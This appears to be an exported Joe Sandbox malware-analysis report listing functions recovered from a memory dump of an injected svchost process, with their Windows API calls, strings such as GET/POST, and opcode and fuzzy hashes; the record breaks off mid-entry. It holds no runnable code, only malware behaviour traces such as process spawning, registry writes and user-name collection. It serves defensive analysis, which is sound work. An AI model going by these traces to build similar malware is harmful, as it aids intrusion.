Yara matches

Similarity

API ID: CloseFileHandle$CreateEventView$MappingObjectSingleSleepUnmapWait
String ID:
API String ID: 3151294157-0
Opcode ID: 68dc189f2565027fafeb0380d72434baca068ea41a6cfe64b0ca389d2a7fb30f
Instruction ID: 3f570299b33c95d5af319e5a67aaaf82ca619af9512a8cf95b9c95bd6b3d50b4
Opcode Fuzzy Hash: 68dc189f2565027fafeb0380d72434baca068ea41a6cfe64b0ca389d2a7fb30f
Instruction Fuzzy Hash: 8F41E5326483A1AFD3219F649C85BABBBE8FF89750F000819F989D6191DF74C449C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 02A51CD5 Relevance: 12.1, APIs: 8, Instructions: 115
memorysleepstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000008,?,?,00000000), ref: 02A51CFD
RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 02A51D04

Part of subcall function 02A51F07: wsprintfA.USER32 ref: 02A51F49

lstrcpy.KERNEL32(00000000,?), ref: 02A51D2D
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02A51DF6
HeapFree.KERNEL32(00000000,?,?,?,?,00000000), ref: 02A51DFD
Sleep.KERNEL32(00001388,?,?,?,?,00000000), ref: 02A51E08
GetProcessHeap.KERNEL32(00000000,00000000,?,?,00000000), ref: 02A51E1A
HeapFree.KERNEL32(00000000,?,?,00000000), ref: 02A51E21

Memory Dump Source

Source File: 0000001C.00000002.2951130325.0000000002A51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02A51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_2a51000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$Free$AllocateSleeplstrcpywsprintf
String ID:
API String ID: 4213899483-0
Opcode ID: 862e4c7ee890b7708acaaa85b695377b63058dc1c138ffb6a5c73ea98318cf6a
Instruction ID: f6ea3c0e9e76c879673b2439a882aba7cba7ab33b3a47d20196c41da3fb19621
Opcode Fuzzy Hash: 862e4c7ee890b7708acaaa85b695377b63058dc1c138ffb6a5c73ea98318cf6a
Instruction Fuzzy Hash: F4417A729043209FD7209F69D888B2BBBE8FF88314F00492EF999D2150DB74D919CF66

Uniqueness

Uniqueness Score: -1.00%

Function 02A51E38 Relevance: 12.1, APIs: 8, Instructions: 81
memorystringthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlen.KERNEL32(00000000,?,?,?,?,02A51148,00000009,00000000,02A571E0,00000007), ref: 02A51E47
GetProcessHeap.KERNEL32(00000008,-0000000B,?,?,?,?,02A51148,00000009,00000000,02A571E0,00000007), ref: 02A51E67
RtlAllocateHeap.NTDLL(00000000), ref: 02A51E6E
lstrcpy.KERNEL32(0000000C,00000000), ref: 02A51E97
CreateThread.KERNEL32(00000000,00000000,02A51F56,00000000,00000000,00000000), ref: 02A51EDB
CloseHandle.KERNEL32(00000000,?,?,?,?,02A51148,00000009,00000000,02A571E0,00000007), ref: 02A51EE6
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,02A51148,00000009,00000000,02A571E0,00000007), ref: 02A51EF3
HeapFree.KERNEL32(00000000,?,?,?,?,02A51148,00000009,00000000,02A571E0,00000007), ref: 02A51EFA

Memory Dump Source

Source File: 0000001C.00000002.2951130325.0000000002A51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02A51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_2a51000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateCloseCreateFreeHandleThreadlstrcpylstrlen
String ID:
API String ID: 3086719409-0
Opcode ID: a4be74c5ada4492e26f19c2970d7f8584c091ff395a79f6720c37b91351021a9
Instruction ID: e89d10b083a9c52b769dc5818e597e90d38fd8c4bf572d3e6595b8038a70836a
Opcode Fuzzy Hash: a4be74c5ada4492e26f19c2970d7f8584c091ff395a79f6720c37b91351021a9
Instruction Fuzzy Hash: 9E219F31900766AFD7118F75CC88B77BBA8FF05358B048919FD4A96215DF70E81ACB60

Uniqueness

Uniqueness Score: -1.00%

Function 02A52DAF Relevance: 12.1, APIs: 8, Instructions: 72
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,?,00000000,?,02A551B9,?,02A570E8,00000000,00000000,?), ref: 02A52DC8
GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,?,02A551B9,?,02A570E8,00000000,00000000,?,00000000), ref: 02A52DDC
CloseHandle.KERNEL32(00000000,?,00000000,?,02A551B9,?,02A570E8,00000000,00000000,?,00000000), ref: 02A52E4D

Memory Dump Source

Source File: 0000001C.00000002.2951130325.0000000002A51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02A51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_2a51000_svchost.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleSize
String ID:
API String ID: 1378416451-0
Opcode ID: a3d5b471212507915c6e310eb3b0102562f07f5ce4517d1c7cb90648a0c1a24c
Instruction ID: d4c50934d40b53c52ca525eb2e694a595b271eb84815de7e49656cd2777d5db3
Opcode Fuzzy Hash: a3d5b471212507915c6e310eb3b0102562f07f5ce4517d1c7cb90648a0c1a24c
Instruction Fuzzy Hash: 29113D71A44331AFD7214F61AC88B6BBEA8FB4A761F004919FE42E6150DF30D916CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02A5598A Relevance: 10.6, APIs: 7, Instructions: 100memoryregistryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 02A559D3
GetProcessHeap.KERNEL32(00000008,00000000), ref: 02A559E8
RtlAllocateHeap.NTDLL(00000000), ref: 02A559EF
RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,-00000001,?), ref: 02A55A09
GetProcessHeap.KERNEL32(00000000,?), ref: 02A55A1E
HeapFree.KERNEL32(00000000), ref: 02A55A25
RegCloseKey.ADVAPI32(00000000), ref: 02A55A2C

Memory Dump Source

Source File: 0000001C.00000002.2951130325.0000000002A51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02A51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_2a51000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$ProcessQueryValue$AllocateCloseFree
String ID:
API String ID: 1930173803-0
Opcode ID: 1c7102c3f2e62e7a3751971e387b600eb7473e22b7d7c9e9381c993476967365
Instruction ID: 93ab6d118c6ea16680513a97ccd7136062d393d5270b67bd3da5d4a2a7945158
Opcode Fuzzy Hash: 1c7102c3f2e62e7a3751971e387b600eb7473e22b7d7c9e9381c993476967365
Instruction Fuzzy Hash: 5431BF71A40321AFE7209F249C88B3BB7A8EF49715F444818FE85DB240EF74D8068A61

Uniqueness

Uniqueness Score: -1.00%

Function 02A515D5 Relevance: 10.6, APIs: 7, Instructions: 75memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?), ref: 02A515E4
GetProcessHeap.KERNEL32(00000008,-00000103), ref: 02A515FA
RtlAllocateHeap.NTDLL(00000000), ref: 02A51601

Part of subcall function 02A556E6: GetTempPathA.KERNEL32(00000104,?), ref: 02A556F7

Part of subcall function 02A52E5A: CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 02A52E75

GetProcessHeap.KERNEL32(00000000,00000000), ref: 02A51669
HeapFree.KERNEL32(00000000), ref: 02A51670
GetProcessHeap.KERNEL32(00000000,?), ref: 02A51683
HeapFree.KERNEL32(00000000), ref: 02A5168A

Memory Dump Source

Source File: 0000001C.00000002.2951130325.0000000002A51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02A51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_2a51000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$Free$AllocateCreateFilePathTemplstrlen
String ID:
API String ID: 953720001-0
Opcode ID: 9648ba55d0b5f346d3f13bfa54e3e0f8a63f76b471df260a4b55d764243b57cc
Instruction ID: 2f41439f56adb8e7aa2aa856b92b11ad5b897cb353f8c7b9b03ac778bc621f1f
Opcode Fuzzy Hash: 9648ba55d0b5f346d3f13bfa54e3e0f8a63f76b471df260a4b55d764243b57cc
Instruction Fuzzy Hash: 4611AC72840325BBE7006FA09C88F7BBBADFB4A715F084809FE4991040DF34D8118B75

Uniqueness

Uniqueness Score: -1.00%

Function 02A54E55 Relevance: 10.6, APIs: 7, Instructions: 62memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00000002,?,?,?,02A549A2,?,?,?,?,00000000,02A570E8), ref: 02A54E70
RtlAllocateHeap.NTDLL(00000000), ref: 02A54E77
CreateThread.KERNEL32(00000000,00000000,02A54F6B,00000000,00000000,00000000), ref: 02A54EAA
GetProcessHeap.KERNEL32(00000000,00000000,?,?,00000000,02A570E8), ref: 02A54EB6
HeapFree.KERNEL32(00000000,?,?,00000000,02A570E8), ref: 02A54EBD
CloseHandle.KERNEL32(00000000,?,?,?,02A549A2,?,?,?,?,00000000,02A570E8), ref: 02A54ECD
CloseHandle.KERNEL32(00000000,?,?,00000000,02A570E8), ref: 02A54EDF

Memory Dump Source

Source File: 0000001C.00000002.2951130325.0000000002A51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02A51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_2a51000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$CloseHandleProcess$AllocateCreateFreeThread
String ID:
API String ID: 1729137577-0
Opcode ID: 1e8d53084c23c1375ddfa26b63fda220c495336e64513496e157a750dbc6aac3
Instruction ID: cf21f54cd48722ec29399a41339c7846763c3b2761b99b58d3949ae35f44fec7
Opcode Fuzzy Hash: 1e8d53084c23c1375ddfa26b63fda220c495336e64513496e157a750dbc6aac3
Instruction Fuzzy Hash: 97112132E843326BD3204F755C4CBA7AA9DBF4EB11F054A18FD41EA188CF30C8468AA0

Uniqueness

Uniqueness Score: -1.00%

Function 02A558A7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60stringprocessCOMMON

Download Yara Rule

APIs

Part of subcall function 02A52EBA: CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000,?,?,?,?,02A52D76,?,?,?,?), ref: 02A52ED5

memset.MSVCRT ref: 02A558E2
lstrcpyW.KERNEL32(?,02A563B4), ref: 02A5590D
lstrcatW.KERNEL32(?,02A5764C), ref: 02A5591F
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 02A5593B
ExitProcess.KERNEL32 ref: 02A55946

Strings

D, xrefs: 02A558EA

Memory Dump Source

Source File: 0000001C.00000002.2951130325.0000000002A51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02A51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_2a51000_svchost.jbxd

Yara matches

Similarity

API ID: CreateProcess$ExitFilelstrcatlstrcpymemset
String ID: D
API String ID: 898148731-2746444292
Opcode ID: 69de7afbddcdca9277bd35783f45dca9be9953f277f3608805c52c2bfb733117
Instruction ID: 2280618d56b7269716f2b76b83ac813b014f36dd9a12ac7f1f16dbaf07bbb06d
Opcode Fuzzy Hash: 69de7afbddcdca9277bd35783f45dca9be9953f277f3608805c52c2bfb733117
Instruction Fuzzy Hash: 5F113CB2940228AFDB10DBE4DD49FABBBBDEF84715F004461BE09E6140EA34DA558F64

Uniqueness

Uniqueness Score: -1.00%

Function 02A53BE0 Relevance: 9.1, APIs: 6, Instructions: 118memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 02A53BF9
RtlReAllocateHeap.NTDLL(00000000), ref: 02A53C4D
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000104,00000000,00000000), ref: 02A53CB5
HeapFree.KERNEL32(00000000), ref: 02A53CEB
HeapFree.KERNEL32(00000000), ref: 02A53D00

Memory Dump Source

Source File: 0000001C.00000002.2951130325.0000000002A51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02A51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_2a51000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Free$AllocateByteCharCurrentMultiProcessWide
String ID:
API String ID: 3321845206-0
Opcode ID: 0f9b498f885127d09dbe028e836d0de534cfa77880fe99a88cc42880c6231277
Instruction ID: 2546ac2096b1c918765b05a205c048d7cf98bfb1cf7fbb6780c8ea5eb5cb209e
Opcode Fuzzy Hash: 0f9b498f885127d09dbe028e836d0de534cfa77880fe99a88cc42880c6231277
Instruction Fuzzy Hash: A231A3716093656FEB209B659C88B7BB6ACEF84B85F040C58BD45D6040EF70D859C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 02A55A75 Relevance: 9.1, APIs: 6, Instructions: 92memoryregistryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,?,00000001), ref: 02A55ACA
RtlAllocateHeap.NTDLL(00000000), ref: 02A55AD1
RegSetValueExA.ADVAPI32(?,00000000,00000000,00000003,00000000,?,00000001), ref: 02A55B24
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02A55B2F
HeapFree.KERNEL32(00000000), ref: 02A55B36
RegCloseKey.ADVAPI32(?), ref: 02A55B3D

Memory Dump Source

Source File: 0000001C.00000002.2951130325.0000000002A51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02A51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_2a51000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateCloseFreeValue
String ID:
API String ID: 1659168586-0
Opcode ID: 916321e5a35dc9e48b26133e64283fab696d69095fc365dfd9a234f8ec7ab9b2
Instruction ID: 6e873e425341aaa9055f707ae3784fc29e8f3c098bf8033edd3555e14320f2ec
Opcode Fuzzy Hash: 916321e5a35dc9e48b26133e64283fab696d69095fc365dfd9a234f8ec7ab9b2
Instruction Fuzzy Hash: 3A212936E447345BC3215FB49C9CB27BBA9EF89A10F414419FB819B241EE70D80587A0

Uniqueness

Uniqueness Score: -1.00%

Function 02A52482 Relevance: 9.1, APIs: 6, Instructions: 71memorystringsynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(00000000), ref: 02A524B4
lstrlen.KERNEL32(00000000), ref: 02A524D7
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02A52524
HeapFree.KERNEL32(00000000), ref: 02A5252B
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02A5254C
HeapFree.KERNEL32(00000000), ref: 02A52553

Memory Dump Source

Source File: 0000001C.00000002.2951130325.0000000002A51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02A51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_2a51000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess$ObjectSingleWaitlstrlen
String ID:
API String ID: 2190776780-0
Opcode ID: 0c2f151dff843a3f3e883d83da58f94e38c8e21a3b4c57a7f673192f57a3aacd
Instruction ID: ecdad8d17c8364ea0e7da0477b8c1d110c45cf161a8d1824a1801dbe4d01efd2
Opcode Fuzzy Hash: 0c2f151dff843a3f3e883d83da58f94e38c8e21a3b4c57a7f673192f57a3aacd
Instruction Fuzzy Hash: E7211D71C41229EBEF15DFA1D9487AFBAB9BF14316F104455ED00B2090DF788A59CB91

Uniqueness

Uniqueness Score: -1.00%

Function 02A538A9 Relevance: 9.1, APIs: 6, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

_vsnprintf.MSVCRT ref: 02A538B8
GetProcessHeap.KERNEL32(00000008,00000009), ref: 02A538D6
RtlAllocateHeap.NTDLL(00000000), ref: 02A538DD
_vsnprintf.MSVCRT ref: 02A538F5
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02A5390C
HeapFree.KERNEL32(00000000), ref: 02A53913

Memory Dump Source

Source File: 0000001C.00000002.2951130325.0000000002A51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02A51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_2a51000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process_vsnprintf$AllocateFree
String ID:
API String ID: 3096491335-0
Opcode ID: 2ab513beefab6c44f039ad4c53635850bdcfe3e6171aceed4d5d70d3b1631319
Instruction ID: 7437aae8b444d79f0192a919a022ff65f6bbed1923168e0123fb17f2145d9cfd
Opcode Fuzzy Hash: 2ab513beefab6c44f039ad4c53635850bdcfe3e6171aceed4d5d70d3b1631319
Instruction Fuzzy Hash: EE01DFB2980229BBDB009AB5DC04F7B776CEB84790F004865FE06D6100EE30D9128B70

Uniqueness

Uniqueness Score: -1.00%

Function 02A54423 Relevance: 9.0, APIs: 6, Instructions: 43memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(02A530CE,00000000,?,02A530CE,?), ref: 02A54433
GetProcessHeap.KERNEL32(00000008), ref: 02A54447
RtlAllocateHeap.NTDLL(00000000), ref: 02A5444E
MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000001), ref: 02A54465
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02A54471
HeapFree.KERNEL32(00000000), ref: 02A54478

Memory Dump Source

Source File: 0000001C.00000002.2951130325.0000000002A51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02A51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_2a51000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateByteCharFreeMultiWidelstrlen
String ID:
API String ID: 180588484-0
Opcode ID: c150c8f808afea20d0a1cb70ced30acae28b57d682bf006f870868b0d363403c
Instruction ID: eb13969c91870698724f9525f470f680c7797cfc83ddcca6b8747ba17bb9a6e8
Opcode Fuzzy Hash: c150c8f808afea20d0a1cb70ced30acae28b57d682bf006f870868b0d363403c
Instruction Fuzzy Hash: 20F04471545232BBD7214F26AC4CE6BBE7CFFC9715F018918F85592014DF30C856D660

Uniqueness

Uniqueness Score: -1.00%

Function 02A516FF Relevance: 9.0, APIs: 6, Instructions: 39memoryCOMMON

Download Yara Rule

APIs

ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,?,02A517FB,00000001), ref: 02A51708
GetProcessHeap.KERNEL32(00000008,-0000003F,00000001), ref: 02A51722
RtlAllocateHeap.NTDLL(00000000), ref: 02A51729
ExpandEnvironmentStringsA.KERNEL32(02A5138F,00000000,-00000040), ref: 02A5173B
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02A51747
HeapFree.KERNEL32(00000000), ref: 02A5174E

Memory Dump Source

Source File: 0000001C.00000002.2951130325.0000000002A51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02A51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_2a51000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$EnvironmentExpandProcessStrings$AllocateFree
String ID:
API String ID: 420829650-0
Opcode ID: 561982613e6be6085e426dc936a013b4e69822f0e0a5e70847e788bf91fc4220
Instruction ID: faec0e3500be5c182bce962a9cd85c093fd807ac7a157326c7201bdbc89a961e
Opcode Fuzzy Hash: 561982613e6be6085e426dc936a013b4e69822f0e0a5e70847e788bf91fc4220
Instruction Fuzzy Hash: 72F03031A84331A7D7215B69AC4CF6B7AA9BB89755F060814FD49E6154EF30CC19CA60

Uniqueness

Uniqueness Score: -1.00%

Function 02A53332 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

QueryPerformanceFrequency.KERNEL32(?,02A560A0), ref: 02A5333C
QueryPerformanceCounter.KERNEL32(?), ref: 02A5334A
RtlLargeIntegerDivide.NTDLL(00000000,?,?,?,00000000), ref: 02A53372
GetTickCount.KERNEL32 ref: 02A5337A

Strings

&%c=%u, xrefs: 02A53332

Memory Dump Source

Source File: 0000001C.00000002.2951130325.0000000002A51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02A51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_2a51000_svchost.jbxd

Yara matches

Similarity

API ID: PerformanceQuery$CountCounterDivideFrequencyIntegerLargeTick
String ID: &%c=%u
API String ID: 1708092081-2762644614
Opcode ID: 84b7e88bce765f1fef0c3d6fdd061412e17ad0144094101876baef1e3b37735e
Instruction ID: c2a0507bd006486276c18bb46aa75d07f7e9c5083674cbf679e5101c2dedd54e
Opcode Fuzzy Hash: 84b7e88bce765f1fef0c3d6fdd061412e17ad0144094101876baef1e3b37735e
Instruction Fuzzy Hash: D9F0E231E10228BBDF10DBE4DC89AAEBBB9BF84351F0448D4E905E2150DF31AA218B10

Uniqueness

Uniqueness Score: -1.00%

Function 02A5175D Relevance: 7.6, APIs: 5, Instructions: 108memoryCOMMON

Download Yara Rule

APIs

StrChrA.SHLWAPI(?,0000003B), ref: 02A51784

Part of subcall function 02A516FF: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,?,02A517FB,00000001), ref: 02A51708

GetProcessHeap.KERNEL32(00000000,?), ref: 02A5180F
HeapFree.KERNEL32(00000000), ref: 02A51816

Memory Dump Source

Source File: 0000001C.00000002.2951130325.0000000002A51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02A51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_2a51000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$EnvironmentExpandFreeProcessStrings
String ID:
API String ID: 2748148605-0
Opcode ID: 4fa6fb7efd0a4411bf2894cdc7a2041806e61cab4a39ac4f4bd01add47bad119
Instruction ID: 043a0f9c66fc6258774a2f99a6698fa64a76e92f2e532c8a13907e1b35b570dc
Opcode Fuzzy Hash: 4fa6fb7efd0a4411bf2894cdc7a2041806e61cab4a39ac4f4bd01add47bad119
Instruction Fuzzy Hash: 7E31E032648332EFEB25AF699C84B3BB7E8AB49350F000829FD8596144EF30D845CB91

Uniqueness

Uniqueness Score: -1.00%

Function 02A55348 Relevance: 7.6, APIs: 5, Instructions: 73memorystringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(?,?), ref: 02A55367
lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,02A550BA,00000000), ref: 02A5537D
GetProcessHeap.KERNEL32(00000008,-0000005F,?,?,?,?,?,?,?,?,?,?,00000000,02A550BA,00000000), ref: 02A5538C
RtlAllocateHeap.NTDLL(00000000), ref: 02A55393
lstrcpy.KERNEL32(00000000,?), ref: 02A553A3

Part of subcall function 02A54543: StrStrIA.SHLWAPI(?,?,?,?,02A5712C,02A562E4,02A57224,?), ref: 02A54563

Memory Dump Source

Source File: 0000001C.00000002.2951130325.0000000002A51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02A51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_2a51000_svchost.jbxd

Yara matches

Similarity

API ID: Heaplstrcpy$AllocateProcesslstrlen
String ID:
API String ID: 3287547560-0
Opcode ID: d94131e91876241a32d64d4686c699a6d70b455f0c736a4c3c4a2d8e6c139b3f
Instruction ID: 324e733b66db9bac066d7e3a19ff664248c2335a6673c37d18b10b572685e07c
Opcode Fuzzy Hash: d94131e91876241a32d64d4686c699a6d70b455f0c736a4c3c4a2d8e6c139b3f
Instruction Fuzzy Hash: 36112C72D84239BAAB01EBE5DC45DFFB7BDBB04700B440416FE11E6010EE709A0A8BA5

Uniqueness

Uniqueness Score: -1.00%

Function 02A53763 Relevance: 7.6, APIs: 5, Instructions: 62memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00000009,00000000,?,02A536F0,02A51134,?), ref: 02A5378E
RtlAllocateHeap.NTDLL(00000000,?,02A536F0), ref: 02A53795
_vsnprintf.MSVCRT ref: 02A537AF
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,02A536F0,02A51134,?), ref: 02A537EC
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,02A536F0,02A51134,?), ref: 02A537F3

Memory Dump Source

Source File: 0000001C.00000002.2951130325.0000000002A51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02A51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_2a51000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateFree_vsnprintf
String ID:
API String ID: 3135751541-0
Opcode ID: 2c05c14fa2355fd06acd772b85271743f7cf03493c8b1ad181813ef976ffc390
Instruction ID: 1c9bbe7b57c1e83ae7119d5ea45d8e0ae4c2ac2e739a130ef72eb5946c09dd79
Opcode Fuzzy Hash: 2c05c14fa2355fd06acd772b85271743f7cf03493c8b1ad181813ef976ffc390
Instruction Fuzzy Hash: 1201A972984221BBDB015775FD45F67BA69EFC47A0F404454FD0496114EE31CC16CB61

Uniqueness

Uniqueness Score: -1.00%

Function 02A54F6B Relevance: 7.5, APIs: 5, Instructions: 36memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02A54F79
GetExitCodeProcess.KERNEL32(00000000,?), ref: 02A54F84
CloseHandle.KERNEL32(00000000), ref: 02A54F8B
GetProcessHeap.KERNEL32(00000000,?), ref: 02A54FB5
HeapFree.KERNEL32(00000000), ref: 02A54FBC

Memory Dump Source

Source File: 0000001C.00000002.2951130325.0000000002A51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02A51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_2a51000_svchost.jbxd

Yara matches

Similarity

API ID: HeapProcess$CloseCodeExitFreeHandleObjectSingleWait
String ID:
API String ID: 2978294806-0
Opcode ID: 3d653496111d67de8e03662892d5c85de079a23884d9ca00e5572abbc1dcf623
Instruction ID: 83cc6c2b960691940e53f870fc13a0dc6cd37d99f27a519e90286ff713464d6d
Opcode Fuzzy Hash: 3d653496111d67de8e03662892d5c85de079a23884d9ca00e5572abbc1dcf623
Instruction Fuzzy Hash: 70F0B432C45239BBDB219FA4DC08A9FBA68FF09B25F004611FD05A6054DF308A668BE1

Uniqueness

Uniqueness Score: -1.00%

Function 02A521C3 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 239memoryCOMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,000000FA), ref: 02A52225
GetProcessHeap.KERNEL32(00000008,000006B5), ref: 02A5225A
RtlAllocateHeap.NTDLL(00000000), ref: 02A52261

Strings

f<v, xrefs: 02A523B0

Memory Dump Source

Source File: 0000001C.00000002.2951130325.0000000002A51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02A51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_2a51000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$AllocateNameProcessUser
String ID: f<v
API String ID: 1296208442-2911902482
Opcode ID: 160a713aa4b34690df1baa520db09b370530d5027c61a7ba51b4736f7e07e4d5
Instruction ID: 8274e4f5e8b3ac43d1f0589bbe400f4858789de43530041a5e32bc89b07a78ef
Opcode Fuzzy Hash: 160a713aa4b34690df1baa520db09b370530d5027c61a7ba51b4736f7e07e4d5
Instruction Fuzzy Hash: E381B072948361ABD321DF64DC84B6BBBECAF85310F05486EFC8993250EB35D945C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 02A5315E Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 166memoryCOMMON

Download Yara Rule

APIs

RtlReAllocateHeap.NTDLL(00000000), ref: 02A532A2
RtlAllocateHeap.NTDLL(00000000), ref: 02A532AF

Strings

POST, xrefs: 02A531B9
GET, xrefs: 02A531D0, 02A531DC

Memory Dump Source

Source File: 0000001C.00000002.2951130325.0000000002A51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02A51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_2a51000_svchost.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: GET$POST
API String ID: 1279760036-3192705859
Opcode ID: 60b9b9dfd11f7c3ee8dbd9b1e949407eaf6b007cbf99ecdd9d4ff63d5e3ec310
Instruction ID: 12664fd783a8ab71911e7f8283a67b7862bec38ba9f93a349cc05c7ae6bebe22
Opcode Fuzzy Hash: 60b9b9dfd11f7c3ee8dbd9b1e949407eaf6b007cbf99ecdd9d4ff63d5e3ec310
Instruction Fuzzy Hash: 865167B1644716AFEB208F64CC85B2BFBECFB88754F044959B996D2150DF34D809CB61

Uniqueness

Uniqueness Score: -1.00%

Function 02A53923 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72processCOMMON

Download Yara Rule

APIs

WTSGetActiveConsoleSessionId.KERNEL32 ref: 02A5392F
memset.MSVCRT ref: 02A53983
CreateProcessAsUserW.ADVAPI32(?,00000000,?,00000000,00000000,00000000,00000400,00000044,00000000,?,?), ref: 02A539B3

Strings

D, xrefs: 02A5398B

Memory Dump Source

Source File: 0000001C.00000002.2951130325.0000000002A51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02A51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_2a51000_svchost.jbxd

Yara matches

Similarity

API ID: ActiveConsoleCreateProcessSessionUsermemset
String ID: D
API String ID: 108488881-2746444292
Opcode ID: b9238d8f38c6c9b7fd48eed581efc970d75e5380c7242eaf7ff49e1a1a5f43d3
Instruction ID: 442839aa122e45407671c2fc8aa88fd765d28d6d68f532917dd4bab59409b26f
